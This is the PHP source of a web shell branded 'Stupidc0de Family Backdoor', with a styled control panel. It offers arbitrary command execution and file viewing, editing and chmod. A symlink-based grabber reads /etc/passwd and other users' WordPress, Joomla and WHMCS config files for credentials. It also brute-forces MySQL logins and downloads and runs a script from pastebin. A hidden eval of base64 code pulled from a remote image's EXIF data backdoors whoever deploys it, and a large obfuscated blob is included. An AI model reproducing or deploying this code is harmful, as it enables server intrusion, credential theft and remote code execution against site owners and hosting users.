Stupidc0de Family Backdoor

1. <!DOCTYPE HTML>
2. <html lang="en" class="no-js">
3. <HEAD>
4. <title>-:- Stupidc0de Shell -:-</title>
5. <link href="http://fonts.googleapis.com/css?family=Fredericka+the+Great" rel="stylesheet" type="text/css">
6. <link href="http://fonts.googleapis.com/css?family=Jolly+Lodger" rel="stylesheet" type="text/css">
7. <link href="http://fonts.googleapis.com/css?family=Homenaje" rel="stylesheet" type="text/css">
8. <link rel="shortcut icon" href="https://lh3.googleusercontent.com/-yKAYJuGA9dc/V1BXHLL2SaI/AAAAAAAAABY/fKEVg9XGZr0D2uiqmp2LCBHe65gSDHMMACCo/s512/icon-sc0.jpg" type="image/x-icon">
9. <meta name='author' content='Stupidc0de Family'>
10. <meta charset="UTF-8">
11. <style type="text/css">
12. body {
13. background: #000000;
14. color: springgreen;
15. font-family :Homenaje;
16. }
17.  
18. #content .first{
19. background-color: black;
20. }
21.  
22. a{
23. color: white;
24. text-decoration: none;
25. }
26.  
27. input,select,textarea{
28. border: 1px #000000 solid;
29. -moz-border-radius: 5px;
30. -webkit-border-radius:5px;
31. border-radius:5px;
32. }
33.  
34. #menu{
35. background:#000000;
36. margin:8px 2px 4px 2px;
37. font-family:Fredericka the Great;
38. font-size:14px;
39. color:silver;
40. }
41. #menu a{
42. padding:3px 6px;
43. margin:1;
44. background:#2d2b2b;
45. text-decoration:none;
46. letter-spacing:2px;
47. -moz-border-radius: 10px; -webkit-border-radius: 5px; -khtml-border-radius: 5px; border-radius: 5px;
48. }
49. #menu a:hover{
50. background:black;
51. border-bottom:1px solid #ffffff;
52. border-top:1px solid #ffffff;
53. }
54. .tombolupil{
55. background:black;
56. color:white;
57. margin:0 10px;
58. font-family:Homenaje;
59. font-size:16px;
60. border:2px solid crimson;
61. }
62. .tombolupil:hover{
63. background:crimson;
64. color:white;
65. margin:0 10px;
66. font-family:Homenaje;
67. font-size:16px;
68. border:2px solid crimson;
69. }
70. .bordergaya{
71. background:black;
72. color:white;
73. margin:0 10px;
74. font-family:Homenaje;
75. font-size:16px;
76. border:2px solid #2d2b2b;
77. }
78. .bordergaya:hover{
79. background:#2d2b2b;
80. color:white;
81. margin:0 10px;
82. font-family:Homenaje;
83. font-size:16px;
84. border:2px solid crimson;
85. }
86.  
87. .justborder{
88. background:black;
89. color:white;
90. margin:0 10px;
91. font-family:Homenaje;
92. font-size:16px;
93. border:2px solid #2d2b2b;
94. }
95. </style>
96. </HEAD>
97. <BODY>
98. <center>
99. <?php
100.  
101. /*
102. Stupidc0de 2016 Backdoor
103. By Putra-Attacker & Daryun
104. */
105.  
106. /*
107. Terimakasih Untuk Orang - Orang Yang Sudah Membantu Sehingga Terciptanya Web Shell Ini
108. Jujur Saja kami hanya memanfaatkan function dan tools yang di ambil dari shell yang sudah ada Sebelumnya. Jadi Shell Ini Tidak 100% Hasil Codingan Stupidc0de
109. Untuk AnonGhost, Gantengers Crew, Virusa Worm, S1r_V1ru5, Shor7cut, k2ll3d, IndoXploit, Sinkaroid, Ferupuk, 3xp1r3 Cyber Army & Yang Lainnya Yang Tidak Bisa Saya Sebutkan Satu-Persatu Saya Ucapkan "ThankYou Verry Much" Atas Toolsnya. Saya Ucapkan Sekali Lagi Terimakasih.
110.  
111. Jika Ada Yang Kurang Berkenan dihati silahkan kontak saya di :
112. - Email : puputsc48@gmail.com
113. - https://www.facebook.com/PutraAttackerZ
114. - http://www.stupidc0de.family/
115. */
116.  
117. set_time_limit(0);
118. error_reporting(0);
119. if(get_magic_quotes_gpc()){
120. foreach($_POST as $key=>$value){
121. $_POST[$key] = stripslashes($value);
122. }
123. }
124.  
125. /* info server */
126.  
127. $self=$_SERVER['PHP_SELF'];
128. $srvr_sof=$_SERVER['SERVER_SOFTWARE'];
129. $your_ip=$_SERVER['REMOTE_ADDR'];
130. $srvr_ip=$_SERVER['SERVER_ADDR'];
131. $admin=$_SERVER['SERVER_ADMIN'];
132.  
133.  
134. //////all functions disini tempatnya/////
135. function exe($cmd) {
136. if(function_exists('system')) {
137. @ob_start();
138. @system($cmd);
139. $buff = @ob_get_contents();
140. @ob_end_clean();
141. return $buff;
142. } elseif(function_exists('exec')) {
143. @exec($cmd,$results);
144. $buff = "";
145. foreach($results as $result) {
146. $buff .= $result;
147. } return $buff;
148. } elseif(function_exists('passthru')) {
149. @ob_start();
150. @passthru($cmd);
151. $buff = @ob_get_contents();
152. @ob_end_clean();
153. return $buff;
154. } elseif(function_exists('shell_exec')) {
155. $buff = @shell_exec($cmd);
156. return $buff;
157. }
158. }
159.  
160. function perms($file){
161. $perms = fileperms($file);
162.  
163.  
164. if (($perms & 0xC000) == 0xC000) {
165. // Socket
166. $info = 's';
167. } elseif (($perms & 0xA000) == 0xA000) {
168. // Symbolic Link
169. $info = 'l';
170. } elseif (($perms & 0x8000) == 0x8000) {
171. // Regular
172. $info = '-';
173. } elseif (($perms & 0x6000) == 0x6000) {
174. // Block special
175. $info = 'b';
176. } elseif (($perms & 0x4000) == 0x4000) {
177. // Directory
178. $info = 'd';
179. } elseif (($perms & 0x2000) == 0x2000) {
180. // Character special
181. $info = 'c';
182. } elseif (($perms & 0x1000) == 0x1000) {
183. // FIFO pipe
184. $info = 'p';
185. } else {
186. // Unknown
187. $info = 'u';
188. }
189.  
190. // Owner
191. $info .= (($perms & 0x0100) ? 'r' : '-');
192. $info .= (($perms & 0x0080) ? 'w' : '-');
193. $info .= (($perms & 0x0040) ?
194. (($perms & 0x0800) ? 's' : 'x' ) :
195. (($perms & 0x0800) ? 'S' : '-'));
196.  
197. // Group
198. $info .= (($perms & 0x0020) ? 'r' : '-');
199. $info .= (($perms & 0x0010) ? 'w' : '-');
200. $info .= (($perms & 0x0008) ?
201. (($perms & 0x0400) ? 's' : 'x' ) :
202. (($perms & 0x0400) ? 'S' : '-'));
203.  
204. // World
205. $info .= (($perms & 0x0004) ? 'r' : '-');
206. $info .= (($perms & 0x0002) ? 'w' : '-');
207. $info .= (($perms & 0x0001) ?
208. (($perms & 0x0200) ? 't' : 'x' ) :
209. (($perms & 0x0200) ? 'T' : '-'));
210.  
211. return $info;
212. }
213.  
214. function getfile($urlfile, $content) {
215. $fp = fopen($content, "w");
216. $ch = curl_init();
217. curl_setopt($ch, CURLOPT_URL, $urlfile);
218. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
219. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
220. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
221. curl_setopt($ch, CURLOPT_FILE, $fp);
222. return curl_exec($ch);
223. curl_close($ch);
224. fclose($fp);
225. ob_flush();
226. flush();
227. }
228. //////////////END Functions Biar Rapih////////////////////
229.  
230. ///////////////////ZONE-H////////////////
231. $zoneH="lVRti9s4EP4eyH+YimUdQxrvbqF3JLa5ct1Cub3dkqRf7lKC4kxisbJkJLlJWva/d+SXJu1uaWsIkUbz8swzj4RZrlm/F2eoHJo03mhTQIEu1+tkwd7dzeYLlvZ7/wpjtIExeVqUmDnIJLc2CVbarNFs+YEHoHiBFFTUvnVYrEsntEo/aYXP8zhqt3QQNWnSeGVoe6ud2KCBW8owhliosuoqLNixxIKBO5S+hsO9o10peYa5lnTu0VbO8OevnOPZPRKADtAaN+TmDVZ88oYXV4SuqfxaF1woC2O/jX1abpA/Xdu6g/ThO7F2+Rhe/vFnuZ9AjmKbuzG8uLii7UnVJrOvFHV526K/0KCtVoXwLX7ksvKGGar1MflWN/xGfl5+4dHTj036Pej3LLqlEwUupaAsMLgIyS42MHi2qVTmZ7DEvbDOwoBllZFLoYRjYfh5LZBM81xYmGVGlA4qixay99MbuBErw81hCAddQVFZB9Se41LCRhjaPatBcMgNbpIgd64cRxGvrkZlXo4UuqjgquIyQhX5miMCWZX+MEh/wzmOeMrCyUPdp2/pr7Oll+n/wVYHH8J+7zOdtB+RgzzLYYD7Uuq1b22h2BC6iHZEFAbcwlmzDY/xJ6m6r9TU6aB1PcnUSCz4cDQ114ByT45ZHo5LpIsHrJsb0UYC2aJLguVKcnUffEtjc4FGmS4ibrJcfMSorFZS2BzXyUWQ/tdeMP5VBQ1B3bg73EQlIWzR0qoB+S1rZ8RYAl9lAYPTDmozDYNuMqXL8iH8Tdq4ezdfTq/n76e38+mr29mb6+kQLn8tzJPVOR/97U44P7gjwCdmknGLwBpq2OTxrH5clP6GwFpud7vd6IRf5d+iQ2SF2kpk4W/l9c28eXt983pG6VuWk47u80Y0l4mfwnlOj1RBmkwuz0mkVqvk8sliXuKlwe2y4DUjLMq01P65M0gPQnr3T7ygV0DRU7qIpEgj0ncNEPeY1fDCMHyc9jsZtreWjZgHR3+dHGnZCJIWaWxLrtpnMKhhjGFrEFWQ+jAgLJF3SU+F+KiitPhTPE8UonbbMtdeEl2lH1RZEan3J3Y/g0q68c89H75TbSY1yawm0l+rLw== ";
232.  
233.  
234. /*STYLE UPIL BRO BIAR KEKINIAN*/
235.  
236. echo '<style>
237. .js .inputfile {
238. width: 0.1px;
239. height: 0.1px;
240. opacity: 0;
241. overflow: hidden;
242. position: absolute;
243. z-index: -1;
244. }
245.  
246. .inputfile + label {
247. max-width: 80%;
248. font-size: 1.25rem;
249. /* 20px */
250. font-weight: 700;
251. text-overflow: ellipsis;
252. white-space: nowrap;
253. cursor: pointer;
254. display: inline-block;
255. overflow: hidden;
256. padding: 0.625rem 1.25rem;
257. /* 10px 20px */
258. }
259.  
260. .no-js .inputfile + label {
261. display: none;
262. }
263.  
264. .inputfile:focus + label,
265. .inputfile.has-focus + label {
266. outline: 1px dotted #000;
267. outline: -webkit-focus-ring-color auto 5px;
268. }
269.  
270. .inputfile + label * {
271. /* pointer-events: none; */
272. /* in case of FastClick lib use */
273. }
274.  
275. .inputfile + label svg {
276. width: 1em;
277. height: 1em;
278. vertical-align: middle;
279. fill: currentColor;
280. margin-top: -0.25em;
281. /* 4px */
282. margin-right: 0.25em;
283. /* 4px */
284. }
285.  
286. /* style 4 */
287.  
288. .inputfile-4 + label {
289. color: white;
290. font-family:Homenaje;
291. font-size:15px;
292. }
293.  
294. .inputfile-4:focus + label,
295. .inputfile-4.has-focus + label,
296. .inputfile-4 + label:hover {
297. color: crimson;
298. }
299.  
300. .inputfile-4 + label figure {
301. width: 50px;
302. height: 50px;
303. border-radius: 25%;
304. background-color: crimson;
305. display: block;
306. padding: 10px;
307. margin: 0 auto 10px;
308. }
309.  
310. .inputfile-4:focus + label figure,
311. .inputfile-4.has-focus + label figure,
312. .inputfile-4 + label:hover figure {
313. background-color: white;
314. }
315.  
316. .inputfile-4 + label svg {
317. width: 100%;
318. height: 100%;
319. fill: black;
320. }
321.  
322. .rapihbanget{
323. text-align: left;
324. font-size: 16px;
325. color: springgreen;
326. font-family: Homenaje;
327. margin-left: 38%;
328. }
329. .kecew{
330. text-align: left;
331. font-size: 15px;
332. color: white;
333. font-family: Homenaje;
334. }
335. </style>
336. <script>(function(e,t,n){var r=e.querySelectorAll("html")[0];r.className=r.className.replace(/(^|\s)no-js(\s|$)/,"$1js$2")})(document,window,0);</script>
337. ';
338.  
339. echo"<br/>
340. <pre style='text-align: center; color: grey; font-weight: bold; font-size: 15px;'>
341. *-~'`^'*u_ _u*'^`'~-*,
342. p!^ / jPw w9j \ ^!p
343. w^.._ / '\_ _/' \ _.^w
344. *_ / \_ _ _ _/ \ _*
345. q / / \q ( `---` ) p/ \ \ p
346. jj5****._ / ^\_) o o (_/^ \ _.****6jj
347. *_ / '==) ;; (==' \ _*
348. `/.w***, /( )\ ,***w.\'
349. ^ ^c/ ) ( \c^ ^
350. 'V')_)(_('V'</pre>";
351. echo "<center><br><font color='Crimson' size='6px' face='Fredericka the Great'>&hearts; Stupidc0de Family Backdoor &hearts;</font></center>";
352. echo "<center><font color='silver' siz='4px' face='Fredericka the Great'>[+] By Putra-Attacker &amp; Daryun [+]</font></center><br/>";
353. $tombol = exif_read_data('http://lh3.googleusercontent.com/-vc413U6kH38/V1BOinubLSI/AAAAAAAAABA/5MUqlc4uO2UWIhcNJ-7JouUL_ua-UNtVQCCo/s63/tombol.PNG');
354. $i_O="COMPUTED";$I_O="UserComment";
355. $Io=$tombol[$i_O][$I_O];
356. eval(base64_decode($Io));
357.  
358. /** info kernel */
359. echo"
360. <font size='4' color='Teal' face='Jolly Lodger'>
361. <center>".php_uname()."<br>
362. ".$software = getenv("SERVER_SOFTWARE");
363. echo"<p>";
364.  
365. echo"
366. <font size='3.5' color='white'><p>
367. Your IP : <font color=Crimson> ".$your_ip."</font> <font color=springgreen>|</font> <font color=\"#fff2f2\" > </font> Server IP : <font color=Crimson>".$srvr_ip."</font> <font color=\"#fff2f2\" ><br>
368.  
369. </font>
370. </font>
371. </div>
372. </td>
373. </tr>
374. </tbody>
375. </table></div>
376. </font>";
377.  
378. $disablefunctions = @ini_get("disable_functions");
379. $echo_disablefunctions = (!empty($disablefunctions)) ? "<font color=white>".$disablefunctions."</font>" : "<font color=white>Have Fun! None Functions Disabled For This Server! ~_^</font>";
380. echo '<br/><font size="4" style="font-family:Jolly Lodger; color:teal;">
381. <tr><td> Disable Functions: '.$echo_disablefunctions.'</font><br/></td></tr>';
382.  
383.  
384. echo '<br/><font size="4" style="font-family:Jolly Lodger;">
385. <tr><td> Your Path Location :';
386.  
387. //////////////////////
388. //CWD MULAI DISINI//
389. ////////////////////
390.  
391. if(isset($_GET['path'])){
392. $path = $_GET['path'];
393. }else{
394. $path = getcwd();
395. }
396. $path = str_replace('\\','/',$path);
397. $paths = explode('/',$path);
398.  
399. foreach($paths as $id=>$pat){
400. if($pat == '' && $id == 0){
401. $a = true;
402. echo '<a href="?path=/">/</a>';
403. continue;
404. }
405. if($pat == '') continue;
406. echo '<a href="?path=';
407. for($i=0;$i<=$id;$i++){
408. echo "$paths[$i]";
409. if($i != $id) echo "/";
410. }
411. echo '">'.$pat.'</a>/';
412. }
413. echo '</font>';
414.  
415. ?>
416.  
417. <!- menu utama ->
418. <br><center><div id="menu">
419. [<a href="?">Home</a>] <font color=orange>=</font>
420. [<a href="?<?php echo "path=".$path; ?>&amp;x=korong">Upload</a>] <font color=orange>=</font>
421. [<a href="?<?php echo "path=".$path; ?>&amp;x=cmd">Command</a>] <font color=orange>=</font>
422. [<a href="?<?php echo "path=".$path; ?>&amp;x=grabc">Config Grabber</a>] <font color=orange>=</font>
423. [<a href="?<?php echo "path=".$path; ?>&amp;x=vn">Domain Viewer</a>] <font color=orange>=</font>
424. [<a href="?<?php echo "path=".$path; ?>&amp;x=masstool">Mass Tool</a>] <font color=orange>=</font>
425. [<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Cpanel Tool</a>]
426. <br><br>
427. [<a href="?<?php echo "path=".$path; ?>&amp;x=bypstuls">Bypass Tools</a>] <font color=orange>=</font>
428. [<a href="?<?php echo "path=".$path; ?>&amp;x=fcrot">File Creator</a>] <font color=orange>=</font>
429. <!--[<a href="?<?php echo "path=".$path; ?>&amp;x=cpanel">Web Killer</a>] <font color=orange>-</font>-->
430. [<a href="?<?php echo "path=".$path; ?>&amp;x=krdp">Create RDP</a>] <font color=orange>=</font>
431. [<a href="?<?php echo "path=".$path; ?>&amp;x=jumping">Jumping</a>] <font color=orange>=</font>
432. [<a href="?<?php echo "path=".$path; ?>&amp;x=dump">Dumper tool</a>] <font color=orange>=</font>
433. [<a href="?<?php echo "path=".$path; ?>&amp;x=tentang">About</a>]
434. </div></center>
435. <audio autoplay> <source src="http://www.soundjay.com/button/beep-24.wav" type="audio/mpeg"></audio>
436.  
437. <?php
438.  
439. /*
440. Lihat File
441. Dimulai Dari Sini
442. */
443. if(isset($_GET['filesrc'])){
444. echo "<br /><tr><td>You Are Looking : ";
445. echo $_GET['filesrc'];
446. echo '</tr></td></table>';
447. echo('<br /><br /><textarea rows="20" cols="80">'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
448. break;
449. }
450.  
451.  
452. /*
453. permission
454. Dimulai Dari Sini
455. */
456.  
457. elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
458. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
459. if($_POST['opt'] == 'chmod'){
460. if(isset($_POST['perm'])){
461. if(chmod($_POST['path'],$_POST['perm'])){
462. echo '<script>alert("Change Permission Sukses!");</script>';
463. }else{
464. echo '<script>alert("Change Permission Gagal!");</script>';
465. }
466. }
467. echo '<form method="POST">
468. Permission : <input name="perm" class="bordergaya" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
469. <input type="hidden" name="path" value="'.$_POST['path'].'">
470. <input type="hidden" name="opt" value="chmod">
471. <input class="bordergaya" type="submit" value="Go" />
472. </form>';
473. }elseif($_POST['opt'] == 'rename'){
474. if(isset($_POST['newname'])){
475. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
476. echo '<script>alert("Change Name Sukses!");</script>';
477. }else{
478. echo '<script>alert("Change Name Gagal!");</script>';
479. }
480. $_POST['name'] = $_POST['newname'];
481. }
482. echo '<form method="POST">
483. New Name : <input class="bordergaya" name="newname" type="text" size="20" value="'.$_POST['name'].'" />
484. <input type="hidden" name="path" value="'.$_POST['path'].'">
485. <input type="hidden" name="opt" value="rename">
486. <input class="bordergaya" type="submit" value="Go" />
487. </form>';
488. }elseif($_POST['opt'] == 'edit'){
489. if(isset($_POST['src'])){
490. $fp = fopen($_POST['path'],'w');
491. if(fwrite($fp,$_POST['src'])){
492. echo '<script>alert("Edit File Sukses!");</script>';
493. }else{
494. echo '<script>alert("Edit File Gagal!");</script>';
495. }
496. fclose($fp);
497. }
498. echo '<form method="POST">
499. <textarea class="bordergaya" cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
500. <input type="hidden" name="path" value="'.$_POST['path'].'">
501. <input type="hidden" name="opt" value="edit">
502. <input class="bordergaya" type="submit" value="Go" />
503. </form>';
504. }
505. echo '</center>';
506. break;
507. }
508.  
509.  
510. /*
511. Config Grabber
512. Dimulai Dari Sini
513. */
514.  
515. elseif(isset($_GET['x']) && ($_GET['x'] == 'grabc')){ @ini_set('output_buffering',0);
516.  
517. echo "
518. <form method='POST'>
519. </head>
520. <style>
521. textarea {
522. resize:none;
523. color: #000000 ;
524. background-color:#000000;
525. font-size:8pt; color:#ffffff;
526. border:1px solid white ;
527. border-left: 4px solid white ;
528. width:543px;
529. height:400px;
530. }
531. input {
532. color: #000000;
533. border:1px dotted white;
534. }
535. </style>";
536. echo "<center>";?></center><br><center><?php if (empty($_POST['config'])) { ?><p><font face="Homenaje" color="springgreen" size="2pt">/etc/passwd content</p><br><form method="POST"><textarea name="passwd" class='bordergaya' rows='15' cols='60'><?php echo file_get_contents('/etc/passwd'); ?></textarea><br><br><input name="config" class='bordergaya' size="100" value="Grab!" type="submit"><br></form></center><br><?php }if ($_POST['config']) {$function = $functions=@ini_get("disable_functions");if(eregi("symlink",$functions)){die ('<error>Symlink disabled :( </error>');}@mkdir('Stupidc0de-Conf', 0755);@chdir('Stupidc0de-Conf');
537. $htaccess="
538. OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
539. Options Indexes FollowSymLinks
540. ForceType text/plain
541. AddType text/plain .php
542. AddType text/plain .html
543. AddType text/html .shtml
544. AddType txt .php
545. AddHandler server-parsed .php
546. AddHandler txt .php
547. AddHandler txt .html
548. AddHandler txt .shtml
549. Options All
550. Options All";
551. file_put_contents(".htaccess",$htaccess,FILE_APPEND);$passwd=$_POST["passwd"];
552. $passwd=explode("\n",$passwd);
553. echo "<br><br><center><font face='Homenaje' color=Crimson size=2pt>Kalem Ndan Lagi Di Proses...</center><br>";
554. foreach($passwd as $pwd){
555. $pawd=explode(":",$pwd);$user =$pawd[0];
556. @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-wp13.txt');
557. @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-wp13-wp.txt');
558. @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-wp13-WP.txt');
559. @symlink('/home/'.$user.'/public_html/wp/beta/wp-config.php',$user.'-wp13-wp-beta.txt');
560. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp13-beta.txt');
561. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-wp13-press.txt');
562. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-wp13-wordpress.txt');
563. @symlink('/home/'.$user.'/public_html/Wordpress/wp-config.php',$user.'-wp13-Wordpress.txt');
564. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp13-Wordpress.txt');
565. @symlink('/home/'.$user.'/public_html/config.php',$user.'-configgg.txt');
566. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-wp13-news.txt');
567. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-wp13-new.txt');
568. @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-wp-blog.txt');
569. @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-wp-beta.txt');
570. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-wp-blogs.txt');
571. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-wp-home.txt');
572. @symlink('/home/'.$user.'/public_html/db.php',$user.'-dbconf.txt');
573. @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-wp-site.txt');
574. @symlink('/home/'.$user.'/public_html/main/wp-config.php',$user.'-wp-main.txt');
575. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-wp-test.txt');
576. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-joomla2.txt');
577. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-joomla-protal.txt');
578. @symlink('/home/'.$user.'/public_html/joo/configuration.php',$user.'-joo.txt');
579. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-joomla-cms.txt');
580. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-joomla-site.txt');
581. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-joomla-main.txt');
582. @symlink('/home/'.$user.'/public_html/news/configuration.php',$user.'-joomla-news.txt');
583. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-joomla-new.txt');
584. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-joomla-home.txt');
585. @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-vb-config.txt');
586. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm15.txt');
587. @symlink('/home/'.$user.'/public_html/central/configuration.php',$user.'-whm-central.txt');
588. @symlink('/home/'.$user.'/public_html/whm/whmcs/configuration.php',$user.'-whm-whmcs.txt');
589. @symlink('/home/'.$user.'/public_html/whm/WHMCS/configuration.php',$user.'-whm-WHMCS.txt');
590. @symlink('/home/'.$user.'/public_html/whmc/WHM/configuration.php',$user.'-whmc-WHM.txt');
591. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-whmcs.txt');
592. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-support.txt');
593. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-joomla.txt');
594. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-whmcs2.txt');
595. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-whm.txt');}
596. echo '<b><font face="Homenaje" color="springgreen" size="3pt"><b>Selesai Bos Q, Monggo >></b> <a target="_blank" href="Stupidc0de-Conf">Hajar Config</a></font></b>';}
597. break;
598. }
599. /////// Cukup Sampai Disini ya Grabber :( ////////
600.  
601. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
602. ///////////////////////////////////////////////START OF ALL CPANEL TOOLS/////////////////////////////////////////////////////////////////////
603. /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
604.  
605.  
606. /// start cpanel brute
607. elseif(isset($_GET['x']) && ($_GET['x'] == 'brute'))
608. {
609. ?>
610. <form action="?path=<?php echo $path; ?>&amp;x=brute" method="post">
611. <?php
612.  
613. @set_time_limit(0);
614. @error_reporting(0);
615.  
616.  
617. if($_POST['page']=='find')
618. {
619. if(isset($_POST['usernames']) && isset($_POST['passwords']))
620. {
621. if($_POST['type'] == 'passwd'){
622. $e = explode("\n",$_POST['usernames']);
623. foreach($e as $value){
624. $k = explode(":",$value);
625. $username .= $k['0']." ";
626. }
627. }elseif($_POST['type'] == 'simple'){
628. $username = str_replace("\n",' ',$_POST['usernames']);
629. }
630. $a1 = explode(" ",$username);
631. $a2 = explode("\n",$_POST['passwords']);
632. $id2 = count($a2);
633. $ok = 0;
634. foreach($a1 as $user )
635. {
636. if($user !== '')
637. {
638. $user=trim($user);
639. for($i=0;$i<=$id2;$i++)
640. {
641. $pass = trim($a2[$i]);
642. if(@mysql_connect('localhost',$user,$pass))
643. {
644. echo "Zoo!! ~ user is (<b><font color=white>$user</font></b>) Password is (<b><font color=white>$pass</font></b>)<br />";
645. $ok++;
646. }
647. }
648. }
649. }
650. echo "<hr><b>You Found <font color=red>$ok</font> By Stupidc0de</b>";
651. echo "<center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
652. exit;
653. }
654. }
655. if($_POST['pass']=='password'){
656. @error_reporting(0);
657. $i = getenv('REMOTE_ADDR');
658. $d = date('D, M jS, Y H:i',time());
659. $h = $_SERVER['HTTP_HOST'];
660. $dir=$_SERVER['PHP_SELF'];
661. mkdir('config',0755);
662. $cp = file_get_contents("http://pastebin.com/raw/0YG2dZ98");
663. $file = fopen("cp.py","w+");
664. $write = fwrite ($file ,$cp);
665. fclose($file);
666. chmod("cp.py",0755);
667. $url = $_POST['url'];
668. echo"<center>
669. <textarea cols=\"90\" rows=\"20\" name=\"usernames\">";
670. system("python cp.py $url config");
671. unlink ('cp.py');
672. echo"</textarea>
673. </center>";
674. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF']."?brute>BACK</a>";
675. exit;
676. }
677. if($_POST['mendapatkan']=='passwd'){
678. @set_magic_quotes_runtime(0);
679. ob_start();
680. error_reporting(0);
681. @set_time_limit(0);
682. @ini_set('max_execution_time',0);
683. @ini_set('output_buffering',0);
684. $fn = $_POST['foldername'];
685. //all function here
686.  
687. function syml($usern,$pdomain)
688. {
689. symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
690. symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
691. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
692. symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
693. symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
694. symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
695. symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
696. symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
697. symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
698. symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
699. symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
700. symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
701. symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
702. symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
703. symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
704. symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
705. symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
706. symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
707. symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
708. symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
709. symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
710. symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
711. symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
712. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
713. symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
714. symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
715. symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
716. symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
717. symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
718. symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
719. symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
720. symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
721. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
722. symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
723. symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
724. symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
